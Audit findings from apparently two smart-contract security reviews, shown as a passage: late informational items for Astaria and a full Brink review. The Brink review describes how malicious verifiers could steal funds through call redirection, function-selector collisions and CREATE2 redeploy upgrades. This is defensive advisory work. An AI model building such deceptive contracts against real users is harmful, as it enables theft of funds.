• AstariaRouter.sol#L196 • AstariaRouter.sol#L268 • CollateralToken.sol#L191 • LienToken.sol#L77 Description: There are quite a few instances that nested if/else blocks are used in for loops and that is the only block in the for loop. 87 for ( ... ) { if () { ... } if else () { ... } ... if else () { ... } else { revert CustomError(); } } Recommendation: For better readability, it might be best to transform these blocks into single if blocks and use the continue keyword instead. for ( ... ) { if( ) { ... continue; } if( ) { ... continue; } ... if( ) { ... continue; } revert CustomError(); } +5.6.61 Document the role guardian plays in the protocol Severity: Informational Context: AstariaRouter.sol Description: The role of guardian is not documented. Recommendation: Document that the guardian can file or update the implementations, COLLATERAL_TOKEN, LienToken and TRANSFER_PROXY. If there are other actions or roles that the guardian can take or is supposed to have, they would also need to be documented. +5.6.62 strategistFee... have not been used can be removed from the codebase. Severity: Informational Context: • AstariaRouter.sol#L219-L220 • IAstariaRouter.sol#L79-L80 Description: strategistFeeNumerator and strategistFeeDenominator are not used except in getStrategist- Fee (which itself also has not been referred to by other contracts). It looks like these have been replaced by the vault fee which gets set by public vault owners when they create the vault. Recommendation: Remove these 2 storage parameters if not planning to incorporate them in the future. 88 +5.6.63 redeemFutureEpoch can be called directly from a public vault to avoid using the endpoint from AstariaRouter Severity: Informational Context: • AstariaRouter.sol#L110 • PublicVault.sol#L128 Description: One can call the redeemFutureEpoch endpoint of the vault directly to avoid the extra gas of juggling assets and multiple contract calls when using the endpoint from AstariaRouter. Recommendation: Document the decision of having the endpoint for AstariaRouter and/or why the same end- point on the public vault has no restriction and can be called by any actor. +5.6.64 Remove unused imports Severity: Informational Context: • AstariaRouter.sol#L30 • AstariaRouter.sol#L37 • AstariaRouter.sol#L39 • AstariaRouter.sol#L40 • LienToken.sol#L24 • PublicVault.sol#L13 • PublicVault.sol#L22 • PublicVault.sol#L23 • PublicVault.sol#L35) • Vault.sol#L13 • Vault.sol#L15 • Vault.sol#L16 • Vault.sol#L18 • Vault.sol#L21 • Vault.sol#L24-L27 • Vault.sol#L29 • WithdrawProxy.sol#L13 • WithdrawProxy.sol#L21 • ERC20-Cloned.sol#L4 • ERC20-Cloned.sol#L5 Description: If an imported file is not used, it can be removed. • LienToken.sol#L24 : since Base64 is only imported in this file, if not used it can be removed from the code- base. Recommendation: Remove unused imports. 89 +5.6.65 Reduce nesting by reverting early Severity: Informational Context: CollateralToken.sol#L645-L669 Description: Code following this pattern: if () { } else { revert(); } can be simplified to remove nesting using custom errors: if (!) { revert(); } or if using require statements, it can be transformed into: require() Recommendation: Check for invalid conditions and revert early. The suggested patterns would make the code- base more readable. +5.6.66 assembly can read constant global variables Severity: Informational Context: WithdrawProxy.sol#L190-L192, Pausable.sol#LL39, ERC20-Cloned.sol#L26 Description: Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. For instance, highlighted code above have the following pattern: bytes32 slot = WITHDRAW_PROXY_SLOT; assembly { s.slot := slot } Here, WITHDRAW_PROXY_SLOT is a constant which can be used directly in assembly code. Recommendation: Directly use constant variables in in assembly code. 90 +5.6.67 Revert with error messages Severity: Informational Context: astaria-core Description: There are many instances of require and revert statements being used without an accompanying error message. Error messages are useful for unit tests to ensure that a call reverted due the intended reason, and helps in identifying the root cause. Recommendation: Add an error message with each revert. Since we recommend converting require statements to revert in "Mixed use of require and revert" issue, you can use custom errors. +5.6.68 Mixed use of require and revert Severity: Informational Context: astaria-core, astaria-gpl, CollectionValidator.sol#L64-L67, UniqueValidator.sol#L65-L68 Description: Astaria codebase uses a mix of require and revert statements. We suggest only following one of these ways to do conditional revert for standardization. Recommendation: Convert all require statements to revert. Be careful with inverting the conditions while doing so. +5.6.69 tokenURI should revert on non-existing tokens Severity: Informational Context: LienToken.sol#LL294 Description: As per ERC721 standard, tokenURI() needs to revert if tokenId doesn't exist. The current code returns empty string for all inputs. Recommendation: Revert if _exists(tokenId) == address(0). Astaria: Fixed in commit d9ebf8. Spearbit: Verified. +5.6.70 Inheriting the same contract twice Severity: Informational Context: Vault.sol#L34, PublicVault.sol#L48-L50 Description: VaultImplementation inherits from AstariaVaultBase (reference). Hence, there is no need to inherit AstariaVaultBase in Vault and PublicVault contract as they both inherit VaultImplementation already. Recommendation: Remove the explicit inheritance of AstariaVaultBase in Vault.sol and PublicVault.sol. Astaria: Fixed in commit 282350. Spearbit: Verified. 91 +5.6.71 No need to re-cast variables Severity: Informational Context: VaultImplementation.sol#L219, LienToken.sol#L627, VaultImplementation.sol#L315, VaultImplementa- tion.sol#L329 Description: Code above highlights redundant type castings. ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); ... address(msg.sender) These type castings are casting variables to the same type. Recommendation: Remove type casting. - ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); + ERC721 CT = COLLATERAL_TOKEN(); ... -address(msg.sender) +msg.sender +5.6.72 Comments do not match implementation Severity: Informational Context: AstariaVaultBase.sol#L9-L40, ILienToken.sol#L63, LienToken.sol#L758 Description: • Scenario 1 & 2: Comments note where each parameter ends in a packed byte array, or parameter width in bytes. The comments are outdated. • Scenario 3: The unless is not implemented. Recommendation: • Scenario 1: AstariaVaultBase.sol#L9-L40 update to correct locations: abstract contract AstariaVaultBase is Clone, IAstariaVaultBase { function name() public view virtual returns (string memory); function symbol() public view virtual returns (string memory); function ROUTER() public pure returns (IAstariaRouter) { return IAstariaRouter(_getArgAddress(0)); //ends at 20 } function IMPL_TYPE() public pure returns (uint8) { return _getArgUint8(20); //ends at 21 } function owner() public pure returns (address) { return _getArgAddress(21); //ends at 44 return _getArgAddress(21); //ends at 41 } function asset() public pure virtual returns (address) { return _getArgAddress(41); //ends at 64 return _getArgAddress(41); //ends at 61 - + - + 92 } - + - + - + function START() public pure returns (uint256) { return _getArgUint256(61); return _getArgUint256(61); //ends at 93 } function EPOCH_LENGTH() public pure returns (uint256) { return _getArgUint256(93); //ends at 116 return _getArgUint256(93); //ends at 125 } function VAULT_FEE() public pure returns (uint256) { return _getArgUint256(125); return _getArgUint256(125); //ends at 157 } function COLLATERAL_TOKEN() public view returns (ICollateralToken) { return ROUTER().COLLATERAL_TOKEN(); } } • Scenario 2: ILienToken.sol#L63 Details has 5 unint256 values: 32 * 5 • Scenario 3: Remove comment or update implementation. +5.6.73 Function can be made internal Severity: Informational Context: LienToken.sol#L649 Description: calculateSlope is only used internally and can be edited from public to internal. +5.6.74 Incomplete Natspec Severity: Informational Context: • LienToken.sol#L616 • LienToken.sol#L738-L750 • CollateralToken.sol#L616-L628 • VaultImplementation.sol#L153-L165 • VaultImplementation.sol#L298-L310 • AstariaRouter.sol#L75-L77 • AstariaRouter.sol#L44-L47 Description: • LienToken.sol#L616 s, @return missing • LienToken.sol#L738-L750 s, position, @return missing • CollateralToken.sol#L616-L628 tokenId_ missing 93 • VaultImplementation.sol#L153-L165 The second * on /** is missing causing the compiler to ignore the Natspec. The Natspec appears to document an old function interface. Params do not match with the function inputs. • VaultImplementation.sol#L298-L310 missing stack and return vaule • AstariaRouter.sol#L75-L77 @param NatSpec is missing for _WITHDRAW_IMPL, _BEACON_PROXY_IMPL and _- CLEARING_HOUSE_IMPL • AstariaRouter.sol#L44-L47 : Leave a comment that AstariaRouter also acts as an IBeacon for different cloned contracts. Recommendation: Add to Natspec comments. +5.6.75 Cannot have multiple liens with same parameters Severity: Informational Context: LienToken.sol#L396 Description: Lien Ids are computed by hashing the Lien struct itself. This means that no two liens can have the same parameters (e.g. same amount, rate, duration, etc.). Recommendation: No changes. Document constraint. Astaria: Working as intended. Spearbit: Acknowledged. +5.6.76 Redundant unchecked can be removed Severity: Informational LienToken.sol#L264, Context: PublicVault.sol#L286 Description: There are no arithmetic operations in these unchecked blocks. For clarity, it can be removed. Recommendation: Removed unchecked. LienToken.sol#L347, LienToken.sol#L395, WithdrawProxy.sol#LL282, +5.6.77 Argument name reuse with different meaning across contracts Severity: Informational Context: AstariaRouter.sol#L476 In VaultImplementation receiver is Description: ken.LienActionEncumber receiver is the lender (the receiver of the LienToken) Recommendation: Consider verbose naming, such as lienTokenReceiver, to reduce opportunity for confusion. the borrower, while here and in ILienTo- 94 +5.6.78 Licensing conflict on inherited dependencies Severity: Informational Context: WithdrawProxy.sol#L18, and others Description: The version of Solmate contracts depended in tne gpl repository on are AGPL Licensed, making the gpl repository adopt the same license. This license is incompatible with the currently UNLICENSED Astaria related contracts. Recommendation: 1. Consider the later versions of Solmate which have updated licensing. 2. Consider applying AGPL license to Astaria. 95 diff --git a/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-1.txt b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-1.txt new file mode 100644 index 0000000..64ae7b9 --- /dev/null +++ b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-1.txt @@ -0,0 +1,25 @@ +4.1.1 The storage slots corresponding to _implementation and _owner could be accidentally overwritten Severity: High Risk Context: ProxyStorage.sol#L7-L10 contract ProxyStorage { address internal _implementation; address internal _owner; } The state variables _implementation and _owner are at slots 0 and 1. The protocol architecture relies on executors calling metaDelegateCall to verifier contracts. Therefore, the storage slots are shared with the storage space of the verifiers. Risk: The first 2 state variables declared in a verifier will overlap with _im- plementation and _owner. Accidentally changing these variables will result in changing the implementation and changing the owner. Funds could be stolen or made inaccessible (accidentally or on purpose). Recommendations: 1. Store the variables at a quasi random memory location determined by a Keccak-256 hash. This pattern is used in Bit.sol#L33. 2. Let the verifiers inherit from ProxyStorage.sol so that the variables _im- plementation and _owner are mapped in storage and will not be overwrit- ten accidentally. It is recommended to check the storage layout using solc --storage-layout or the equivalent standard-json flag to verify that this is indeed the case; we recommend building a small tool for doing this. 3. Store the _implementation and the _owner as constants or immutable. This allows for a smaller proxy that saves gas. However, this requires some architectural changes. 5 Brink: We chose to fix, but took a slightly different approach than any of the recommended fixes. Our fix is closest to recommendation 3.While recommen- dations 1 and 2 would have been simpler to implement, and may prevent an accidental overwrite of the _implementation and _owner values, fixing in this way would not prevent an attacker from overwriting these values by tricking an account owner into signing permissions for the overwrite. We wanted to make the values fully immutable after Proxy deployment. We up- dated Proxy.sol to include two constants: ACCOUNT_IMPLEMENTATION, which is the deterministic address for the Account.sol deployment and will be consis- tent across all chains, and OWNER, which is set as a placeholder address 0xfe- feFEFeFEFEFEFEFeFefefefefeFEfEfefefEfe. We created AccountFactory.sol which dynamically creates Proxy init code, inserting the actual owner address at the same location as the OWNER placeholder. When Proxy makes a dele- gatecall to Account, the value of OWNER is read using extcodecopy (ProxyGet- table.sol). Constant and immutable storage read from a contract executed via delegate will be read from the implementation contract (Account.sol), not the calling contract (Proxy). Using extcodecopy lets us read a constant value from the Proxy deployed bytecode. Note: In order for us to compile Proxy.sol with the OWNER placeholder included in the deployed bytecode, we had to include a reference to it in the contract (out- side of the constructor). We found Proxy.sol#L40 to be the most gas efficient way to accomplish this. We believe it has no security impact on the Proxy, and only increases the gas for incoming ETH transfers by a negligible amount. Brink Update: We updated to use Minimal Proxy with the owner address ap- pended at the end of the deployed bytecode commit 0ed725b. Spearbit: We welcome this change, and performed a follow up review focussed on the modification on Minimal Proxy contract. Overall, we agree that the issues are resolved. Detailed comments can be found in the follow up report. 4.2 Medium Risk +4.2.1 Risk of replay attacks across chains Severity: Medium Risk, Gas Optimization Context: EIP712SignerRecovery.sol#L12-L14 Currently, for deploying on EVM compatible chains, the unique identifier _- chainId is specified by Brink. The users need to trust the deployer, i.e. Brink 6 to have unique values of _chainId for different chains. If the deployer violates this condition, there is a risk of replay attacks, where signed messages on one chain may be replayed on another chain. Recommendation: Read _chainId on chain directly, using block.chainid (avail- able from Solidity 0.8.0) or using chainid() in inline assembly for older solidity versions, rather than as a constructor parameter. It is also a gas optimization (saves 1 gas). constructor(uint256_chainId) EIP7125SignerRecovery(chainId_){ ... } Brink: Fixed in commit feef7d9. There is potential risk that a chain could hard- fork a change to the chainID value, which would invalidate all signed messages. The main benefit and reason for the fix was so the Account.sol address can be consistent across all chains. Since Proxy.sol now sets this address to the ACCOUNT_IMPLEMENTATION constant, this keeps all Proxy addresses consistent across all chains as well. Spearbit: Resolved. We think that a hardfork / protocol-upgrade that changes the value of chainid is extremely unlikely on almost all big chains, therefore this risk is acceptable. +4.2.2 Selfdestruct risks in delegateCall() Severity: Medium Risk Context: Account.sol#L48-L57 function delegateCall(address to, bytes memory data) external { require(proxyOwner() == msg.sender, "NOT_OWNER"); assembly { let result := delegatecall(gas(), to, add(data, 0x20), mload(data), 0, 0) if eq(result, 0) { returndatacopy(0, 0, returndatasize()) revert(0, returndatasize()) } } } The address where Account.sol gets deployed can be directly called. There is the risk of a potential selfdestruct, which would result in user wallets getting bricked. This risk depends on the access control of the functions delegateCall, metaDelegateCall, and metaDelegateCall_EIP1271. However, we couldn’t find a hole in the access control. We would still recommend the following changes: 7 1. Explicitly enforce that these functions are only delegatecalled. The follow- ing contract demonstrates how this can be achieved. abstract contract OnlyDelegateCallable { address immutable deploymentAddress = address(this); modifier onlyDelegateCallable() { require(address(this) != deploymentAddress); _; } } 2. Note that the Solidity compiler enforces call protection for libraries, i.e., the compiler automatically adds an equivalent of the above onlyDelegate- Callable modifier to state modifying functions. Changing the contract to a library would require additional changes in the codebase. 3. Deploy Account.sol via CREATE2 so it can be redeployed if necessary. Note: Assuming that the current access control can be broken, and that the ad- dress corresponding to the Account.sol contract holds funds, then an attacker can steal this funds from this address. However, this is not the most significant risk. Brink: Fixed in commit 3afeaf1. Spearbit: Resolved. +4.2.3 Check for non-zero data Severity: Medium Risk Context: Account.sol#L76-L78 bytes memory callData = abi.encodePacked(data, unsignedData); The function metaDelegateCall() does not currently check if data is non-empty. Risk: If data.length is equal to 0, it should call the fallback or receive func- tion, however, a malicious verifier can redirect this call to another function by crafting unsignedData. For example, assume that the user signed a meta trans- action to the following contract’s fallback function: 8 contract C { fallback() external { // do something useful } function f() external { // steal funds } } The executor can append the selector of f to unsignedData, thereby executing the call to f instead of to the fallback function. Note: similarly, if the data (signed) is less than 4 bytes in length, i.e., length of a function selector, executors could potentially redirect the actual call to another function in the same contract, and potentially steal funds. Recommendation: Check data.length is greater than or equal to 4 bytes. require(data.length > 4); Brink: We chose not to implement a fix. Our reasoning is that there are many ways for a malicious verifier to attack a user’s account, but all of these attacks re- quire tricking the user into signing a message with the malicious verifier contract set as the to address. Even if we prevent valid signing of empty call data, users could still sign malicious messages with valid call data. Reverting on empty call data doesn’t reduce the potential for this type of attack. These attacks need to be mitigated off-chain. Spearbit: As this falls under the trust model for the protocol, i.e., trusting verifier contracts, we accept Brink’s approach. See the section on verifiers that talks about the risk model. 4.3 Low Risk +4.3.1 Implement SafeERC20 to avoid non-zero to non-zero approvals Severity: Low Risk Context: TransferHelper.sol#L12-L13 (bool success, bytes memory data) = token.call(abi.encodeWithSelector(0x095ea7b3, to, value)); ,! require(success && (data.length == 0 || abi.decode(data, (bool))), ,! 'APPROVE_FAILED'); 9 Current function allows for non-zero to non-zero approvals, however, some ERC20 tokens would revert in such cases. Reference: approval race protec- tions Recommendations: 1. Implement the SafeERC20 from OpenZeppelin, in particular safeApprove, if it is used. 2. Replace the hex codes with .selector, i.e. abi.encodeWithSelector(token.approve.selector, to, value); 3. The function safeApprove is currently not used. We recommend removing safeApprove(). Brink: We removed TransferHelper from LimitSwapVerifiers commit 7e6df62, because transfer checks were not needed here. It is still used in TransferVeri- fier, but safeApprove() is not used. We will consider implementing this fix for future verifiers if safeApprove() is used. Spearbit: Resolved. 4.4 Gas Optimizations and Informational +4.4.1 The function storageLoad() is not required Severity: Gas Optimization Context: Account.sol#L25-L27 The function storageLoad function is unnecessary. Recommendation: This information can be obtained off-chain using getStor- ageAt JSON RPC method. This will reduce overall gas since the function stor- ageLoad will end up in the function dispatch, making other function calls more expensive. For additional info, here is the part where storageLoad is used from the sdk: Account.js#L269 Brink: Fixed in commit 743eea1. Spearbit: Resolved. 10 +4.4.2 Use _owner directly instead of the function proxyOwner Severity: Gas Optimization The proxyOwner() gettable is called several times in Account.sol. Recommendation: Use _owner directly. mutable and query the owner using a callback to the proxy. If possible, consider making it im- 1. Account.sol#L35 2. Account.sol#L53 3. Account.sol#L83 require(proxyOwner() == signer, "NOT_OWNER"); Note: this optimization may be redundant if a newer version of solidity is used (>= 0.8.2). It has a bytecode level inliner that can inline proxyOwner. Brink: No longer relevant after the changes in proxy: commit d2df98f. Spearbit: Resolved. +4.4.3 Copy _delegate code to be inline in the fallback() function Severity: Gas Optimization Context: Proxy.sol#L27-L29 fallback() external payable { _delegate(_implementation); } Currently, the function _delegate is declared outside the fallback() function. However, inlining this function would save some gas. Recommendation: 1. Use the code inside the _delegate function inside the fallback() func- tion. Save around 20-30 gas. 2. Remove the _delegate function. Note: the improvements for the inliner in Solidity 0.8.2 is not relevant here, i.e., this function needs to be manually inlined. Brink: Fixed in commit 8ec3c96. 11 Spearbit: Resolved. +4.4.4 The functions metaDelegateCall() and externalCall can be made payable Severity: Gas Optimization Context: 1. Account.sol#L34 2. Account.sol#L76 Recommendation: Make the metaDelegateCall() function payable. This saves gas by omitting the check for the absence of ETH attached to the call. Brink: Fixed in commit 5014986. Spearbit: Resolved. +4.4.5 Change memory to calldata Severity: Gas Optimization For external function parameters, it is often more optimal to have the reference location to be calldata instead of memory. Details can be found in the appendix. Examples: 1. The variable signature in the function metaDelegateCall_EIP1271(). Con- text: Account.sol#L109-L116. function metaDelegateCall_EIP1271( address to, bytes memory data, bytes memory signature, bytes memory unsignedData ,! ) external { require(_isValidSignature( proxyOwner(), keccak256(abi.encode(META_DELEGATE_CALL_EIP1271_TYPEHASH, to, keccak256(data))), signature ,! ), , "INVALID_SIGNATURE"); 2. The variable initCode in the function deployAndExecute. Context: De- ployAndExecute.sol#L23. 12 function deployAndExecute(bytes memory initCode, bytes32 salt, bytes memory ,! execData) external { Note: this is assuming that the last suggestion about having the code inline is not implemented. Note: the gas for the deployAndExecute’s unit test decreased by around 1000 after this change. 3. The variable data in the functions tokenToToken, ethToToken, and token- ToEth. Context: LimitSwapVerifier.sol#L33-L34. function tokenToToken( uint256 bitmapIndex, uint256 bit, IERC20 tokenIn, IERC20 tokenOut, uint256 tokenInAmount, uint256 tokenOutAmount, uint256 expiryBlock, address to, bytes memory data ,! ) 4. The variable signature in the function _recoverSigner. Context: EIP712- SignerRecovery.sol#L19. function _recoverSigner(bytes32 dataHash, bytes memory signature) internal view ,! returns (address) { Brink: 1. Fixed in commit 2831884 and commit 68c68ef. 2. DeployAndExecute.sol was replaced with DeployAndCall.sol. With the new AccountFactory.sol there is no initCode parameter. 3. Fixed in commit 1a0345f. 4. Fixed in commit 2831884. Sperabit: Resolved. +4.4.6 initCode could be hard coded if it is always the same Severity: Gas Optimization Context: DeployAndExecute.sol#L23 function deployAndExecute(bytes memory initCode, bytes32 salt, bytes memory ,! execData) external { Recommendation: Hard code initCode into the contract. This saves a signifi- cant amount of gas, as well as guarantee that the right init code is used. 13 new Proxy{salt: salt}(implementation, proxyOwner); If the code for the deployed contract comes from calldata (as is the case here), it has to go through an inefficient copy to memory (via a for-loop that reads 32- byte chunks of calldata using calldataload, and storing them in memory via mstore). On the other hand, if the initCode is available along with the runtime code of the contract and is called via new Proxy{salt: ...}(...), (it does not matter if it is a create2 or create), it is more efficient, because it uses codecopy to place the underlying initcode in memory rather than the inefficient for loop. this assumes that the initCode remains consistent, which is likely the Note: case for Brink. Brink: We created AccountFactory.sol to deploy Proxy account contracts with constant account implementation addresses and owners, as part of the fix. Proxy initCode is now dynamically created on deploy. Spearbit: Resolved. +4.4.7 The function proxyCall can be removed Severity: Informational, Gas Optimization Context: CallExecutor.sol#L52 function proxyPayableCall(address to, bytes memory data) public payable { There isn’t a need for proxyCall as proxyPaybleCall is more general. The function selector of the function proxyCall(...) is smaller than the selector of proxyPayableCall. Therefore, in the function dispatch, proxyCall will appear first (Note: this is not always true). Recommendation: We recommend getting rid of proxyCall and just use prox- yPayableCall, after, perhaps renaming it. Brink: We chose not to fix because of the low impact, but may fix in future verifier contracts. +4.4.8 Gas optimization for keccak256() Severity: Gas Optimization 14 Context: Bit.sol#L33 return keccak256(abi.encodePacked("bmp", bitmapIndex)); Currently, Brink.trade is using keccak256() every time on line 33. Recommendation: It may be worth computing the keccak hash as a constant, and the pointer is computed by incrementing this constant. This avoids comput- ing the Keccak-256 hash at runtime. For example, define a bytes32 initialPtr = keccak256(“bmp”); Then the actual pointer can be computed by: uint256 ptr = initialPtr + n; Note that it’s critical that value of ptr is not the slot 0 or 1. Otherwise, the storage slots will collide with the owner and implementation for proxy. One way to achieve this is by limiting the type of n to be a short unsigned integer type, for example uint16. Brink: Fixed in commit 1fdf2ea. Spearbit: Resolved. +4.4.9 Use inline assembly to avoid short-circuiting Severity: Gas Optimization Context: Bit.sol#L26-L28. function validBit(uint256 bit) internal pure returns (bool) { return bit > 0 && bit & bit-1 == 0; } Solidity has short-circuiting for boolean operations. The way it’s implemented is by using if (i.e., jumpi instruction) for each sub expression. This can be unnecessary in some cases, especially, when the sub expressions are side- effect free. Recommendation: Implement it using inline assembly to avoid the short-circuiting: isValid := and( iszero(iszero(bit)), iszero(and(bit, sub(bit, 1))) ) 15 Note: this expression is parsed as ((bit > 0) && (bit & (bit - 1))) == 0. If this is the intended, consider adding braces to make it more explicit. Brink: Fixed in commit cb078d3, and commit 5f487e8. Spearbit: Resolved. +4.4.10 Use nonces for Bit.sol Severity: Gas Optimization, Informational Context: Bit.sol#L8 library Bit { ... } Currently, for replay protection, random storage slots are reused up to 256 times, using 1 bit per transaction. With a large number of transactions more and more storage slots are used. Recommendation: Use nonces for storing transactions that are currently in flight. For example, assuming that there can only be at most 10 in-flight trans- actions, consider a state variable uint256[10] nonces. For each in-flight trans- action, one of the nonces can be used, then incremented during the transaction. An advantage is that each storage slot can be used up to 2**256 times (in con- trast, currently, it can be used at most 256 times), leading to some gas savings. Also if more simultaneous transactions in flight are expected, then a dynamic If you can define an array should be used to allow for more nonces. Note: upper limit to the transactions in flight, you can use fixed storage slots (0 - 10) in the lower part of the storage, which might be cheaper in the future with the proposed move to stateless ethereum. Note: this suggestion assumes that _implementation and _owner variables are moved to immutable variables; otherwise, using the slots 0 and 1 would lead to storage slot clash and potential lockup of proxied account. Brink: We chose not to fix because of the complexity of implementation com- pared to the relatively small gas savings. We’ll consider this implementation for future verifier contracts. Spearbit: While, this is reasonable, it’s important that all verifiers have compat- ible mechanisms to prevent replay prevention. This avoids using a nonce that was scheduled by another verifier, by accident. 16 +4.4.11 Upgrade to the latest compiler version: 0.8.10 Severity: Informational, Gas optimization Context: All contracts. Currently, brink.trade is using the 0.7.6 version of the compiler. Recommendation: Upgrade the compiler to 0.8.10 and lock it for that spe- cific version. Advantages to switching include external calls requiring less gas (extcodesize is no longer done on functions that have return parameters). Ex- ample of an external call that will be 100 gas cheaper: EIP1271Validator.sol#L19 pragma solidity =0.8.10 Brink: Fixed. • commit 9fb87e4 and • commit 864aef4. Spearbit: Resolved. +4.4.12 Custom errors from version 0.8.4 are more gas efficient Severity: Gas Optimization Context: All uses of revert strings, for example DeployAndExecute.sol#L29 require(createdContract != address(0), "DeployAndExecute: contract not ,! deployed"); Custom errors from Solidity 0.8.4 are more gas efficient than revert strings, when the revert condition is met, and also decreases deploy time costs. Recommendation: Use 0.8.4’s custom errors instead to save on gas. For more information: Solidity blog. Brink: Fixed commit 1260ad0 and commit d1bf851 Spearbit: Resolved. +4.4.13 Add call protection to LimitSwapVerifier Severity: Informational 17 The contract LimitSwapVerifier is only meant to be delegatecalled. This can be explicitly enforced by adding call protection. Recommendation: Add call protection or, alternatively, use a library instead of a contract, as the solidity compiler can automatically add this check. Example of call protection: abstract contract OnlyDelegateCallable { address immutable deploymentAddress = address(this); modifier onlyDelegateCallable() { require(address(this) != deploymentAddress); _; } } Brink: We chose not to implement the fix because there is no risk of selfde- struct, or any other consequence of calling LimitSwapVerifier directly. +4.4.14 Not following solidity memory model in inline assembly usage Severity: Informational Context: 1. Account.sol#L36 assembly { let result := call(gas(), to, value, add(data, 0x20), mload(data), 0, 0) returndatacopy(0, 0, returndatasize()) switch result case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } 2. DeployAndExecute.sol#L32-L42 These inline assembly snippets does not follow Solidity’s memory model. The returndatacopy of calls are stored at memory location starting from 0. How- ever, this may lead to overwriting the free memory pointer as well as writing beyond 0-64. Risk: 18 1. This may cause issues in the future versions, if you need to use stack to memory mover. This is true for almost all inline assembly usage. Refer- ence: (https://twitter.com/ethchris/status/1439879409675259907) 2. The free memory pointer may be overwritten by the return data. If a future refactoring of the code passes the control flow to high-level solidity, i.e., outside the inline assembly block, this would lead to undefined behaviour. Recommendation: This currently will not cause any issues. Be aware of up- grading to a different version of the compiler while using stack to memory mover or a refactoring that passes control flow outside the inline assembly block that overwrites the free memory pointer. The idiomatic approach would be to store dynamic data starting from mload(64) (the free memory pointer) rather than from 0. However, making this change is not strictly necessary right now. Brink: No fix implemented. The current implementation does not adversely affect functionality, and will not have an impact on any of the call data execution that happens before returndatacopy is executed. +4.4.15 Improving documentation regarding delegatecalls. Severity: Informational Context: Account.sol#L9 There is no explicit documentation stating that the Account contract is supposed to only be delegatecalled. Recommendation: Add a NatSpec comment that the contract is only supposed to be delegatecalled. Brink: Fixed commit c92b533 Spearbit: Resolved. +4.4.16 Variables can be defined inline Severity: Informational Context: Account.sol#L12-L21 Currently, the constants META_DELEGATE_CALL_TYPEHASH and META_DELEGATE_- CALL_EIP1271_TYPEHASH are not defined inline. They could be defined inline to 19 improve readability. Recommendation: Declare these variables inline. bytes32 constant META_DELEGATE_CALL_TYPEHASH = keccak256("MetaDelegateCall(address to,bytes data)"); ,! bytes32 constant META_DELEGATE_CALL_EIP1271_TYPEHASH = ,! keccak256("MetaDelegateCall_EIP1271(address to,bytes data)"); Brink: Chose not to implement because impact is very low. +4.4.17 Add events to other functions beyond cancel Severity: Informational Context: CancelVerifier.sol#L16 emit Cancel(bitmapIndex, bit); There is an emit in cancel(), but not other functions. Recommendation: Retrieving the execution state is important for cancel() as well as for other functions. If you are doing an emit, it is probably better to do it from Access.sol. This way it is always there and opens up the opportunity to create a graph or subgraph for it. Brink: We have generally avoided emitting events with data that is already included in functional params. We may actually remove this Cancel event in a future version of CancelVerifier. +4.4.18 The function proxyCall can be made external Severity: Informational Context: CallExecutor.sol#L30 function proxyCall(address to, bytes memory data) public { Function currently marked public, however, it is never called internally. Recommendation: Mark function external. It is generally a good practice to apply the most constrictive visibility possible. Brink: We chose not to fix because of the low impact, but may fix in future verifier contracts. 20 +4.4.19 Contracts that could be made abstract Severity: Informational It is a good practice to mark contracts that are not meant to be instantiated di- rectly as abstract contracts. This is an idiomatic way to ensure that a contract is not meant to be deployed by itself. The following contracts can be made abstract: 1. EIP712SignerRecovery 2. EIP712Validator 3. ProxySettable 4. ProxyGettable 5. ProxyStorage Brink: Fixed commit 3b6d6dd, and ProxySettable.sol was removed, as it was no longer relevant. Spearbit: Resolved. +4.4.20 Floating pragma is set Severity: Informational Context: All contracts. The current pragma Solidity directive is ˆ0.7.6. It is recommended to specify a specific compiler version to ensure that the byte code produced does not vary between builds. Contracts should be deployed using the same compiler ver- sion/flags with which they have been tested. Locking the pragma (for e.g. by not using ˆ in pragma solidity 0.8.10) ensures that contracts do not acciden- tally get deployed using an older compiler version with known compiler bugs. Recommendation: Lock the compiler to a specific version. pragma solidity =0.7.6; Brink: Fixed • commit 9fb87e4 and • commit 864aef4. 21 Spearbit: Resolved. 5 A note on verifiers The Brink protocol relies on verifiers, i.e., smart contracts that perform a specific automation. This is achieved by signing a meta delegatecall to these smart contracts. Because of that, it is very important that these verifier contracts are well vetted. For example, the risk of a malicious verifier directly impacts the user potentially losing all their funds by signing a message to a malicious verifier. There are several ways in which a verifier can hide their malicious behaviour. Some examples are given below: 1. Verifier Contract is upgradable: If a verifier contract is upgradable, and a user signs a message to this contract, the verifier can upgrade the contract just before the execution, to make the signed data malicious. • Since a typical upgradable contract works by delegatecalling its im- plementation, where the implementation is stored in storage, these kinds of contracts are inconsistent with Brink.trade. This is because the meta transactions delegatecalls into the verifier, which means that the verifier cannot use its own storage. • A non-typical upgradable pattern involves CREATE2 deploy + selfde- struct + CREATE2 redeploy, where the second redeploy will deploy a different runtime code. There are some tricks involved getting the same address, but having different runtime code: example. If the signer also signs the extcodehash for the verifier contract, such at- tacks can be prevented. If during execution, the extcodehash is dif- ferent from what was part of the signature, the execution reverts. However, this might not cover all possible cases. 2. If anyone can add arbitrary verifier contracts, you could trick a user in the following way. • The verifier contract has the innocent looking function with signature: cancel(uint248 bitmapIndex, uint248 bit) external. • The verifier contract has a function named safeguardfunds_, where nonce is engineered to collide with the selector of the function cancel(uint256,uint256). Such collisions can be easily found in a few minutes or one can also lookup 4byte.directory. 22 • The user may be tricked to sign in to our cancel verifier, however, in turn it executes safeguardfunds_, which steals funds. Recommendations: 1. Thoroughly vet all verifier contracts, including the function selectors. 2. Avoid verifier contracts that are upgradable. 3. Consider enforcing that all verifiers should be libraries with external func- tions. The solidity compiler enforces that libraries do not have state vari- ables and automatically adds call protection to state modifying functions. 4. Design modular verifiers doing only a single task. 6 A note on executors The Brink protocol relies on executors running the transaction when certain conditions are met. For example, assume that a user tries to do a limit swap of 1 ETH to 5000 DAI, an executor is required to watch the ETH to DAI price, and perform a swap when the price is greater than 5000 DAI. The executor profits any difference in price. It is therefore imperative that the protocol relies on more than one executor. This is because a single executor can decide to prolong the execution, for example, by waiting for the ETH price to be 5500 DAI, making a net profit of 500 DAI. Note: This strategy involves the risk of losing out on potential rewards, by wait- ing for the price to move. Regardless, having multiple independent executors would make the protocol more efficient by making the margins low. We recommend Brink to onboard new executors to the platform. The MEV Job Board for example would be a good place to advertise for bots. A second issue is related to how the executors perform the execution. Brink 